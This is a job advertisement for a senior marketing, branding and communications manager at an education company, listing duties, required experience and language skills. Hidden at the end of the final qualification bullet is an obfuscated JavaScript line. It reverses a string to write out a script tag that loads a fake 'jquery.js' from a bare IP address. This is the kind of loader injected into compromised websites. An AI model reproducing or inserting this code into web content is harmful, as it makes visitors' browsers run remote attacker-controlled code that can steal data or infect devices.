Industry : Education
• Formulate, articulate and execute a strategic marketing, branding, public relations and communications vision that internally and externally promote specific services and expertise offered by the Company.
• Lead unit level multi-channel marketing and communications efforts that target internal and external audiences, support business goals and enhance the reputation of the Company.
• Provide insights of marketing, branding and communications to Programme Developmen and Product Portfolio teams.
• Lead in the preparation and coordination of all Corporate Identity templates, Branding and collaterals.
• Lead the preparation and development of the company strategic printed materials ie Yearly Annual Report, Corporate Collaterals and marketing materials
• Coordinate, promote and support special events, conference and trade show activities.
• Develop and implement marketing plans by working with internal and external stakeholders, suppliers and marketing partners.
• Prepare content for in-house, print and digital marketing communications in relations to the programme and products.
• Bachelor’s degree in Marketing, Mass Communications, Public Relations, Business Studies, Business Administration, or equivalent in a related field.
• Experience (7-9 years) in corporate communications, marketing and public relations position (with min 2 years in Managerial position).
• Demonstrate project management experience in organizing, planning and executing projects from conception through implementation, or possesses strong conceptual skills and understanding of marketing planning and brand management.
• Demonstrate strong and effective verbal and written Bahasa Malaysia and English communication skills.
• Comfortable to interact with C-Levels and Senior Managements.
• Possesses strong business acumen and analytical skills document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))
To apply for this job email your details to email@example.com